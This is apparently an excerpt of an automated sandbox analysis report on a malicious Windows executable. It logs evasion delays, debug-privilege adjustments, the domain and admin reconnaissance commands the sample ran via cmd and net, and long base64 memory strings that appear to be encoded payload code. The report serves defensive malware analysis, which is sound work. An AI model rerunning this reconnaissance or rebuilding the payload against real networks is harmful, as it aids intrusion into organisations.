Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pydJump to dropped file
Source: C:\Windows\System32\conhost.exe TID: 6616Thread sleep count: 256 > 30
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe TID: 6988Thread sleep time: -18000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 5859 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep count: 2348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI65282\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI65~1\
Source: powershell.exe, 0000000C.00000003.257895409.000001FD82502000.00000004.00000001.sdmpBinary or memory string: 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
Source: powershell.exe, 0000000C.00000003.261937270.000001FD8337D000.00000004.00000001.sdmpBinary or memory string: Cocw4AQL8IANm/CADgcg4A3L8IAPTACABseA4A/MAIAKHCCAAIiQ4ApMIIAL7CCAB0cw4AHMMIAK/ECAAAcw4AsMQIAJLFCACocw4AlMUIAN/FCABgdg4A4MUIACjGCACocw4AKMYIAGHGCADgcg4AgMYIAP3GCACQpg4AAMcIAEzHCADgcg4AVMcIABXKCAAAew4AGMoIAK3KCADIdA4AsMoIAADLCADQgA4AAMsIALfLCADEpg4A3MsIAJvMCAB0dA4AwMwIAO/NCACUpg4A8M0IAKrOCACgeA4ArM4IACHPCADgcg4AJM8IAO3PCADwpg4AiNAIAMDQCADgcg4AwNAIAOXQCADgcg4A9NAIADfRCADgcg4AONEIADvSCAD4pg4APNIIAFPSCADgcg4AVNIIAMrSCAB0dA4AzNIIABjTCACocw4ALNMIALnUCADIdA4AyNQIADTWCAAspw4ANNYIAH3WCABgdg4AgNYIAOzWCABUcw4AGNcIANTYCA
Source: powershell.exe, 0000000C.00000003.261937270.000001FD8337D000.00000004.00000001.sdmpBinary or memory string: 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
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 0000000C.00000003.263431656.000001FD8355E000.00000004.00000001.sdmpBinary or memory string: EI1EJDxQ/9b/dCQQjUQkRFD/1v90JBSNRCQ0UP/WU41EJDRQUP8VLFgIEItMJDCLRCRAg8ECiz2gVAgQA8FmiUQkIg+3wFBqQP/XiUQkJIXAD4STAAAAizUoWAgQjUQkMFCNRCQkUP/WjUQkQFCNRCQkUP/Wi0wkOItEJCCDwQIDwWaJRCQqD7fAUGpA/9eLPYRUCBCJRCQshcB0R41EJDhQjUQkLFD/1o1EJCBQjUQkLFD/1ot0JBiLTJxIjUQkIFZQg/kDjUQkMI1UJEAPRNDox/3//0NZWYP7BHLb/3QkLP/X/3QkJP/XX14zwFuL5V3DVYvsg+T4g+wki8JTVleFyQ+ESgMAAI1MJCBRiwiNVCQg6OX2+/9ZhcAPhB0DAACLXCQcZosDjVMCiuiJVCQQiswPt8G5BAUAAIlEJCRmO8F0FklmO8F0I2hAfgoQ6BcS/P9Z6dsCAABmiwKK6IrMD7fBg8ACA8KJRCQQjUQkKFCNVCQcjUwkFOifAwAA
Source: powershell.exe, 0000000C.00000003.261817341.000001FD8332D000.00000004.00000001.sdmpBinary or memory string: ZXJ2ZXJMaXN0ZW4AxAFScGNTZXJ2ZXJSZWdpc3RlckF1dGhJbmZvVwAAiAFScGNFcFVucmVnaXN0ZXIAhgFScGNFcFJlZ2lzdGVyVwAAvAFScGNTZXJ2ZXJJbnFCaW5k
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000C.00000003.263431656.000001FD8355E000.00000004.00000001.sdmpBinary or memory string: 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
Source: NETSTAT.EXE, 00000024.00000002.436374601.00000000031F7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: powershell.exe, 0000000C.00000003.257895409.000001FD82502000.00000004.00000001.sdmpBinary or memory string: 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
Source: WMIC.exe, 00000005.00000002.210837033.0000000000E00000.00000002.00000001.sdmp, net1.exe, 0000000B.00000002.217845921.0000000003770000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Users\user\Desktop\UlJpFEz1Cj.exe 'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c wmic ntdomain get domainname
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net localgroup administrators
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c net group 'domain admins' /domain
